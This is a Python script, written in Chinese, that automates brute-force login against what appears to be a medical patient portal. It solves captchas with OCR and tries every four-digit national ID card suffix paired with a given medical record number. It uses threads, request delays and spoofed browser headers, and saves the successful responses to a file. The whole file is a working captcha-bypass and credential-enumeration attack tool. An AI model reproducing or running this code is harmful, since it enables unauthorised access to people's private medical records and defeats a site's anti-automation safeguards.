import requests import base64 import ddddocr from cairosvg import svg2png import time import json import threading from concurrent.futures import ThreadPoolExecutor, as_completed from io import BytesIO import re import os
class CaptchaLoginTester: def __init__(self, base_url, max_workers=3, request_delay=1.0, retry_delay=2.0): self.session = requests.Session() self.ocr = ddddocr.DdddOcr(show_ad=False) self.max_workers = max_workers self.found = False self.lock = threading.Lock() self.base_url = base_url.rstrip('/') self.request_delay = request_delay self.retry_delay = retry_delay self.last_request_time = 0
self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/json', 'Origin': self.base_url, 'Sec-Ch-Ua': '"Chromium";v="139", "Not;A=Brand";v="99"', 'Sec-Ch-Ua-Mobile': '?0', 'Sec-Ch-Ua-Platform': '"Windows"', 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin', 'Priority': 'u=1, i', 'Connection': 'keep-alive' }
self.captcha_url = f"{self.base_url}/api/captcha" self.login_url = f"{self.base_url}/api/auth "
self.debug_dir = "captcha_debug" if not os.path.exists(self.debug_dir): os.makedirs(self.debug_dir)
def apply_delay(self): """应用请求延时""" current_time = time.time() time_since_last_request = current_time - self.last_request_time if time_since_last_request < self.request_delay: sleep_time = self.request_delay - time_since_last_request time.sleep(sleep_time) self.last_request_time = time.time()
def get_captcha(self): """获取验证码图片和ID""" try: self.apply_delay() response = self.session.post(self.captcha_url, headers=self.headers, timeout=10) response.raise_for_status()
data = response.json() if data.get("code") == "AAA": captcha_id = data["data"]["id"] image_data = data["data"]["image"] print(f"✅ 验证码获取成功,ID: {captcha_id}") return captcha_id, image_data else: print(f"❌ 获取验证码失败: {data.get('msg', '未知错误')}") return None, None
except Exception as e: print(f"❌ 获取验证码时发生错误: {e}") return None, None
def convert_svg_to_png(self, svg_data): """使用cairosvg将SVG转换为PNG""" try: png_data = svg2png(bytestring=svg_data) return png_data except ImportError: print("❌ 未安装cairosvg,请运行: pip install cairosvg") return None except Exception as e: print(f"❌ SVG转PNG失败: {e}") return None
def recognize_captcha(self, image_data): """识别验证码""" try: if image_data.startswith('data:image/svg+xml;base64,'): base64_str = image_data.replace('data:image/svg+xml;base64,', '') svg_bytes = base64.b64decode(base64_str) png_data = self.convert_svg_to_png(svg_bytes) timestamp = int(time.time()) debug_filename = f"captcha_{timestamp}.png" filepath = os.path.join(self.debug_dir, debug_filename) with open(filepath, 'wb') as f: f.write(png_data) print(f"验证码图片已保存: {filepath}") captcha_text = self.ocr.classification(png_data) else: if image_data.startswith('data:image/'): base64_str = re.sub(r'^data:image/\w+;base64,', '', image_data) else: base64_str = image_data img_bytes = base64.b64decode(base64_str) timestamp = int(time.time()) debug_filename = f"captcha_{timestamp}.png" filepath = os.path.join(self.debug_dir, debug_filename) with open(filepath, 'wb') as f: f.write(img_bytes) print(f"验证码图片已保存: {filepath}") captcha_text = self.ocr.classification(img_bytes) if captcha_text and len(captcha_text) >= 4: print(f"识别结果: {captcha_text}") return captcha_text.upper() else: print(f"识别结果过短或为空: '{captcha_text}'") return None except Exception as e: print(f"验证码识别失败: {e}") return None def attempt_login(self, id_card_last_four, medical_record_no, max_captcha_retries=10): """尝试使用给定的身份证后四位和ID号登录""" if self.found: return False, id_card_last_four, None
captcha_attempts = 0 while captcha_attempts < max_captcha_retries: try: self.apply_delay() captcha_id, image_data = self.get_captcha() if not captcha_id: print(f"身份证后四位 {id_card_last_four}: 获取验证码失败,重试中...") time.sleep(self.retry_delay) continue
captcha_text = self.recognize_captcha(image_data) if not captcha_text: print(f"身份证后四位 {id_card_last_four}: 验证码识别失败,重试中...") time.sleep(self.retry_delay) continue
login_data = { "ID_card": id_card_last_four, "medical_record_no": medical_record_no, "id": captcha_id, "captcha": captcha_text }
print(f"登录请求URL: {self.login_url}") print(f"登录请求数据: {json.dumps(login_data, ensure_ascii=False)}")
self.apply_delay() response = self.session.post( self.login_url, headers=self.headers, json=login_data, timeout=10 ) response.raise_for_status()
result = response.json() captcha_attempts += 1 print(f"登录响应: {result}")
if result.get("code") == "AAA": with self.lock: self.found = True print(f"✅ 登录成功! 身份证后四位: {id_card_last_four}") print(f"完整响应: {result}") return True, id_card_last_four, result
elif result.get("code") == "BBB": print(f"身份证后四位 {id_card_last_four}: 第{captcha_attempts}次尝试 - 验证码不存在,重新获取验证码...") continue
elif result.get("code") == "CCC": print(f"身份证后四位 {id_card_last_four}: 第{captcha_attempts}次尝试 - 认证失败(验证码: {captcha_text}),切换到下一个身份证") return False, id_card_last_four, result
else: print(f"身份证后四位 {id_card_last_four}: 第{captcha_attempts}次尝试 - 未知响应: {result.get('code')},继续尝试") continue
except requests.exceptions.RequestException as e: print(f"身份证后四位 {id_card_last_four}: 请求失败: {e}") if hasattr(e, 'response') and e.response is not None: try: print(f"错误响应内容: {e.response.text}") except: pass time.sleep(self.retry_delay) except Exception as e: print(f"身份证后四位 {id_card_last_four}: 发生未知错误: {e}") time.sleep(self.retry_delay)
print(f"身份证后四位 {id_card_last_four}: 达到最大验证码重试次数 ({max_captcha_retries}),切换到下一个身份证") return False, id_card_last_four, None
def brute_force_id_card(self, medical_record_no="88888888", start_from=0, end_at=10000): """遍历身份证后四位进行尝试""" print("开始遍历身份证后四位...") print(f"ID号: {medical_record_no}") print(f"范围: {start_from:04d} 到 {end_at:04d}") print(f"请求延时: {self.request_delay}秒") print(f"重试延时: {self.retry_delay}秒") print("=" * 50)
successful_attempts = [] total_attempts = min(end_at, 10000) - start_from
id_suffixes = [f"{i:04d}" for i in range(start_from, min(end_at, 10000))]
with ThreadPoolExecutor(max_workers=self.max_workers) as executor: future_to_suffix = { executor.submit(self.attempt_login, suffix, medical_record_no): suffix for suffix in id_suffixes }
completed = 0 for future in as_completed(future_to_suffix): if self.found: print("✅ 已找到正确的身份证后四位,停止所有尝试") executor.shutdown(wait=False) for f in as_completed(future_to_suffix): if f.done() and not f.cancelled(): try: success, attempted_suffix, result = f.result() if success: successful_attempts.append((attempted_suffix, result)) except: pass break
suffix = future_to_suffix[future] completed += 1
try: success, attempted_suffix, result = future.result() if success: successful_attempts.append((attempted_suffix, result)) with self.lock: self.found = True
if completed % 10 == 0: print(f"进度: {completed}/{total_attempts} ({completed/total_attempts*100:.1f}%)") time.sleep(2)
except Exception as e: print(f"处理身份证后四位 {suffix} 时发生异常: {e}")
print("\n" + "=" * 50) if successful_attempts: print("找到以下有效的身份证后四位:") for suffix, result in successful_attempts: print(f"✅ 后四位: {suffix}") else: print("未找到有效的身份证后四位")
return successful_attempts
def test_connection(self): """测试连接和验证码获取""" print("测试连接...") captcha_id, image_data = self.get_captcha() if captcha_id and image_data: print(f"图像数据类型: {'SVG' if 'svg' in image_data else '其他'}") print(f"图像数据长度: {len(image_data)}") captcha_text = self.recognize_captcha(image_data) if captcha_text: print(f"✅ 验证码识别成功: {captcha_text}") return True else: print("❌ 验证码识别失败") return False else: print("❌ 验证码获取失败") return False
def main(): base_url = input("请输入目标网站基础URL (例如: https://xxx.xxx.xxx): ").strip() if not base_url: print("必须提供基础URL") return
request_delay = input("请输入请求间隔延时(秒,默认: 1.0): ").strip() if not request_delay: request_delay = 1.0 else: try: request_delay = float(request_delay) except: request_delay = 1.0 retry_delay = input("请输入重试间隔延时(秒,默认: 2.0): ").strip() if not retry_delay: retry_delay = 2.0 else: try: retry_delay = float(retry_delay) except: retry_delay = 2.0
tester = CaptchaLoginTester( base_url=base_url, max_workers=3, request_delay=request_delay, retry_delay=retry_delay )
print("\n正在测试连接和验证码识别...") if not tester.test_connection(): print("❌ 连接测试失败,请检查以下问题:") print("1. 网络连接是否正常") print("2. URL是否正确") try: import ddddocr print("✅ ddddocr 已安装") except ImportError: print("❌ ddddocr 未安装,请运行: pip install ddddocr") try: from cairosvg import svg2png print("✅ cairosvg 已安装") except ImportError: print("❌ cairosvg 未安装,请运行: pip install cairosvg") return
medical_record_no = input("请输入ID号 (默认: 88888888): ").strip() if not medical_record_no: medical_record_no = "88888888"
start_from = input("请输入起始身份证后四位 (默认: 0000): ").strip() if not start_from.isdigit() or len(start_from) != 4: start_from = 0 else: start_from = int(start_from)
end_at = input("请输入结束身份证后四位 (默认: 10000): ").strip() if not end_at.isdigit(): end_at = 10000 else: end_at = int(end_at) + 1
max_workers = input("请输入并发线程数 (默认: 3): ").strip() if not max_workers.isdigit(): max_workers = 3 else: max_workers = int(max_workers) max_workers = max(1, min(max_workers, 5))
tester.max_workers = max_workers
print("\n开始尝试...") start_time = time.time()
successful_attempts = tester.brute_force_id_card( medical_record_no=medical_record_no, start_from=start_from, end_at=end_at )
end_time = time.time() print(f"总耗时: {end_time - start_time:.2f} 秒")
if successful_attempts: timestamp = time.strftime("%Y%m%d_%H%M%S") filename = f"successful_attempts_{timestamp}.txt" with open(filename, "w", encoding="utf-8") as f: f.write(f"测试时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n") f.write(f"目标URL: {base_url}\n") f.write(f"ID号: {medical_record_no}\n") f.write("成功的身份证后四位:\n") for suffix, result in successful_attempts: f.write(f"后四位: {suffix}, 响应: {json.dumps(result, ensure_ascii=False)}\n") print(f"结果已保存到 {filename}")
if __name__ == "__main__": main()
|